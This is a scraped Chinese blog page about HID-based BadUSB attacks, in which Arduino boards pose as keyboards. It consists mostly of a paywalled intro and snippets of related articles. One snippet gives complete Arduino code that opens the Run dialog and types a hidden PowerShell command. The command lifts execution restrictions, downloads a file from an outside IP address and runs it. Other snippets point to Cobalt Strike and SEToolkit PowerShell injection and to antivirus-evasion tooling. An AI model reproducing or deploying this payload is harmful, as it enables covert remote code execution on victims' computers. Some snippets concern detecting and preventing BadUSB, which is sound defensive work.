基于HID的badUSB攻击

最新推荐文章于 2022-12-09 10:09:48 发布
最新推荐文章于 2022-12-09 10:09:48 发布
阅读量1.5k 收藏 6
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/compass17/article/details/79915438
版权
本文介绍了基于HID(Human Interface Device)的BadUSB攻击,这种攻击方式利用arduino开发板模拟键盘、鼠标等设备进行恶意操作。通过在Arduino IDE中烧录特定代码,可以实现对Windows系统的自动驱动加载,从而控制电脑行为,例如执行win+R等快捷键操作。
摘要由CSDN通过智能技术生成

USB-HID 为Human Interface Device的缩写,是直接与人交互的设备,其设备例如键盘、鼠标与游戏杆等。基本原理为:将攻击代码植入内存芯片的引导程序当中,windows系统下会自动加载USB的引导程序,如鼠标键盘之类的驱动程序。基于此原理,可用arduino开发板模拟HID攻击。为badusb的衍生攻击方式,利用arduino模拟键盘鼠标控制电脑。

最低0.47元/天 解锁文章
六猴儿羽
关注
疯狂的极客--初识BadUSB
Peter_FHC的博客
05-27 2648
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击,主流有四种工具,本文便对其做简单介绍。
BadUSB攻击
qq_45391176的博客
09-08 2301
一文读懂Bad USB
USB HID 攻击、深度学习方法检测
weixin_44346287的博客
12-31 347
USB HID 攻击、深度学习方法检测 USB HID 攻击 通过篡改USB设备的描述符,枚举一个USB键盘,获取目标计算机权限,注入精心设计的攻击向量,篡改目标机设置,更爱路由,扫描敏感文件等。 未完待续。。。。 ...
什么是BadUSB攻击以及如何预防
ITmoster的博客
12-09 4161
BadUSB 是带有嵌入式固件的闪存驱动器,可用于重新编程设备并允许它充当人机界面小工具,例如键盘、鼠标或耳机。它们用于通过有效地伪装成人机接口设备 (HID) 在计算机上执行各种操作。换句话说,BadUSB是虚拟键盘,可以预先编程以在计算机上键入字符,而无需物理操作。一旦插入,他们就可以直接开始工作,甚至执行需要同时使用两个或多个键的复杂击键。
改进版 | 浅析几种HID硬件攻击
蚁景网安学院
05-31 946
本文原创作者:MR.zhang原创投稿详情:重金悬赏 | 合天原创投稿等你本篇文章在上篇文章上做了改进,写得更详细生动,可收藏学习!0x01 WhatIs HIDHID全称为Human...
打造基于Linux的廉价badusb攻击.pdf
08-08
许多人在研究badusb中致力于底层的HID USB代码执行上来做文章,本演讲或许可以另辟蹊径带来一次全新的对Badusb攻击的参考。通过搭载Linux的微型嵌入式设备来进行快捷而灵活的攻击以及信息收集。并为各位带来一种新的...
基于HID攻击的特种木马的设计与实现论文.doc
最新发布
08-09
论文首先介绍了 BADUSB 攻击方式的来源和基本原理,然后详细讲述了 Teensy 芯片的基本知识和应用,最后设计和实现了基于 HID 攻击方式的特种木马,旨在研究和防范 BADUSB 攻击方式。 BADUSB 攻击方式的来源和基本...
badusb详细制作教程(两种方式实现远控)
热门推荐
Ghost_system的博客
08-17 1万+
badusb是一种几乎可以突破任何杀毒软件和防火墙的设备,堪称渗透测试利器 文章目录前言一、什么是badusb?二,badusb的优点三,badusb是如何攻击的?badusb原理HID攻击漏洞产生原因三、准备步骤1.设备2,编辑器的安装与设置四,编写代码(重点)第一种: SEToolkit + badusb实现PowerShell注入攻击第二种:Cobalt Strike + badusb 实现PowerShell注入攻击五,烧录六,badusb有多强大攻击场景总结 BadUSB是《黑客军团》中
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
BadUSB教程
Canicula_1的博客
10-07 2248
BadUSB环境配置教程 可以解决的问题包括: 编译时最后出现:exit status 1 DigiKeyboard.h对应多个库-----这个搜索电脑里的这个库,除了使用编辑器文件夹下的,统统删掉。 1、文件-首选项-开发板网址: http://digistump.com/package_digistump_index.json 2、在编辑器对应的库中添加文件 Digis...
BadUSB制作教程_BadUSB简单示例(初学)_程序编写工具
Jason Xu 的博客
04-10 5991
说明 本文章仅供学习交流,请勿用于非法用途 我用的是CJMCU-Beetle arduino Leonardo USB ATMEGA32U4 Mini Size Development Board 官网购买地址https://www.thanksbuyer.com/cjmcu-beetle-arduino-leonardo-usb-atmega32u4-mini-size-development-board-35975 软件-Arduino Kali下自带 Windows下 官网下载地址 https://
BadUsb制作
qq_34341458的博客
03-09 8273
型号: Digispark kickstarter 微型USB开发板 ATTINY58 就是下面这种 x宝有卖9元左右。 一. 准备: attiny驱动下载:https://www.arduino.cc/en/Main/Software?setlang=cn Arduino IDE:https://www.arduino.cc/en/software 免杀工具(自选):https://github.com/danielbohannon/Invoke-Obfuscation CobaltStrike且有
尝试用ATTINY88开发板做虚拟键盘
weixin_55619815的博客
03-09 2412
尝试用ATTINY88开发板做虚拟键盘 本人小白一枚,本职工作跟理工不沾边……作为一个垃圾佬平时闲暇就玩玩LED、小电机啥的模拟电路,一周前翻出来一个超市收银机用的键盘,板载芯片被打磨了,看样子像是51单片机,决定拿出来玩玩,经过一个星期的尝试和学习,不算是经验,就是借助贵宝地做个简单的笔记。 当初,认为最简单的模拟键盘就是ATTINY85的板子digispark,所以撸了一片开始研究和学习arduino基本用法,看看示例啥的,但无奈85的接口太少,8pin中usb占用了4个,无意中发现ATTINY88开发
Badusb 攻击之MacOSX系统实战
BaCde's Blog
04-08 768
Badusb 已经出现了很多年,使用usb进行攻击的手段也从最初的利用autorun.inf、伪造文件夹名、快捷方式等手段转为更加难以防御的Badusb。这种攻击方式就是目前可绕过杀毒软件,防御较难。 点此打开观看一段演示视频,需fq。 利用场景 说下本文中利用场景: 混入企业内部,员工电脑未锁屏的情况下。在之前去过很多客户那里,大多数企业的员工离开电脑前不锁屏的情况,而且非常严重。 对于无安全...
badusb(一)环境配置
B0rn_T0_W1n的博客
12-03 1996
badusb 环境配置
digispark使用
越过你画的线的博客
03-28 2637
Digspark ATtiny 85开发 工具 https://downloads.arduino.cc/arduino-1.8.9-windows.zip https://github-production-release-asset-2e65be.s3.amazonaws.com/28220127/e05aa054-9020-11e6-9de6-61504f7ad160?X-Amz-...
我的学习之旅 keyboard.h和keyboard.c
baidu_25474831的专栏
04-23 1165
简化处理,只支持基本常用的按键操作。 keyboard.h源代码: #ifndef __KEY_BOARD_H__ #define __KEY_BOARD_H__ /*shift键的按下和释放*/ #define press_left_shift 0x2a #define press_right_shift 0x36 #
HID攻击BADUSB:特种木马设计与防范
"这篇论文详细探讨了基于HID(Human Interface Device)攻击的特种木马设计与实现,特别是在BADUSB攻击思路的基础上。BADUSB是一种利用USB设备,特别是HID设备如键盘、鼠标等的自读写功能进行恶意攻击的技术。论文...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值